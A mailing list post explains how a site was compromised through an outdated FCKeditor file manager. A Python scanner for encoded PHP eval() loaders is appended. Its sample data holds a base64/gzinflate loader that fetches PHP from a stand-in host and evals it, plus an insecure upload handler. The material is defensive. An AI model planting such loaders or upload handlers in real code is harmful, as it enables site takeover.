Matt Shaffer wrote:
Right, but what I meant was if someone manages to upload their own PHP
file to the lazarus server, they can easily have uploaded a PHP file
manager which has the capability of deleting files, etc, without ever
needing ssh/ftp (this assumes the attack was done through a vulnerable
piece of software, that had write permissions, etc.)

I don't think this scenario is extremely likely.

This is probably what happened.
As I see now, together with tinyportal comes an outdated FCKeditor. This editor has known issues. The file manager in this editor has access to some tp subdir where we found a php "filemanager" through which you could upload files to the whole site. This way some "buy-your-software-here" webshop got installed and then managed to add a piece of encoded php to index.php. What this encoded piece did was access a remote server, which in its turn returned a piece of php which got executed. This piece of php accesses our or similar webshops to generate traffic.
This last part made browsing the site slow.

At this moment the FCKeditor is disabled and removed.

Marc

--
_______________________________________________
Lazarus mailing list
[email protected]
http://lists.lazarus.freepascal.org/mailman/listinfo/lazarus
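Marc's description above is a common pattern: an upload primitive (the PHP "filemanager") is used to drop a loader into index.php, the loader is hidden behind base64/gzinflate wrapping, and what it actually does is fetch more PHP from a remote host and eval() it. The scanner below is an added example, not code from the thread or from the Lazarus or TinyPortal projects; it decodes such wrapper chains the way PHP would evaluate them and reports the remote-fetch and upload indicators. The file names, the payload, and the host bad.example are constructed sample data, not anything recovered from the real incident.

```python
"""Scan PHP sources for encoded eval() loaders and upload primitives.

All sample files and the payload below are constructed for this example.
"""
import base64
import codecs
import re
import zlib

# Constructed loader body: fetch PHP from a remote host and execute it.
_INNER = '$c = file_get_contents("http://bad.example/payload.txt"); eval($c);'
# PHP's gzinflate() expects raw DEFLATE, so strip the zlib header (2 bytes)
# and the adler32 trailer (4 bytes) from zlib.compress() output.
_ENCODED = base64.b64encode(zlib.compress(_INNER.encode())[2:-4]).decode()

SAMPLE_FILES = {  # constructed sample tree
    "index.php": (
        "<?php\n"
        "require 'Sources/Load.php';\n"
        f"eval(gzinflate(base64_decode('{_ENCODED}')));\n"
    ),
    "Themes/default/index.php": "<?php\nrequire 'Settings.php';\n",
    "tp/filemanager.php": (
        "<?php\n$f = $_FILES['f'];\n"
        "move_uploaded_file($f['tmp_name'], $_GET['d'] . $f['name']);\n"
    ),
}

# eval( <one or more decode/inflate wrappers>( '<literal>' ...
ENCODED_EVAL = re.compile(
    r"eval\s*\(\s*((?:(?:gzinflate|gzuncompress|base64_decode|str_rot13)\s*\(\s*)+)"
    r"['\"]([A-Za-z0-9+/=]+)['\"]"
)
REMOTE_FETCH = re.compile(
    r"(?:file_get_contents|fopen|curl_init)\s*\(\s*['\"]?https?://"
    r"|fsockopen\s*\(|curl_exec\s*\("
)
UPLOAD_PRIMITIVE = re.compile(r"move_uploaded_file\s*\(|\$_FILES\b")


def decode_layers(wrappers, literal):
    """Undo a wrapper chain innermost-first, mirroring PHP's evaluation order."""
    data = literal.encode()
    for name in reversed(wrappers):
        if name == "base64_decode":
            data = base64.b64decode(data)
        elif name == "gzinflate":  # raw DEFLATE, no zlib header
            data = zlib.decompress(data, -15)
        elif name == "gzuncompress":  # zlib-wrapped DEFLATE
            data = zlib.decompress(data)
        elif name == "str_rot13":
            data = codecs.encode(data.decode("latin-1"), "rot_13").encode("latin-1")
        else:
            raise ValueError(f"unsupported wrapper {name}")
    return data.decode("utf-8", errors="replace")


def scan_php(files):
    """Return {path: [finding, ...]} for every file; a clean file maps to []."""
    report = {}
    for path, src in files.items():
        findings = []
        for m in ENCODED_EVAL.finditer(src):
            wrappers = re.findall(r"[a-z0-9_]+", m.group(1))
            findings.append({"kind": "encoded_eval", "detail": "(".join(wrappers) + "(...)"})
            try:
                inner = decode_layers(wrappers, m.group(2))
            except (ValueError, zlib.error):
                inner = ""  # undecodable: still suspicious, but nothing more to say
            if REMOTE_FETCH.search(inner):
                findings.append({"kind": "remote_fetch", "detail": inner[:80]})
        if UPLOAD_PRIMITIVE.search(src):
            findings.append({"kind": "upload_primitive", "detail": path})
        report[path] = findings
    return report


if __name__ == "__main__":
    for path, findings in scan_php(SAMPLE_FILES).items():
        for f in findings:
            print(f"{path}: {f['kind']}: {f['detail']}")
```

Running it against a real tree means reading the files from disk instead of SAMPLE_FILES; the decoding step is what matters, because a plain grep for "http://" never sees the URL hidden inside the base64/gzinflate layers. An upload_primitive hit is not proof of compromise on its own (a CMS legitimately handles uploads), but a writable upload handler reachable without authentication, like the one in the thread, is exactly the foothold the loader needs.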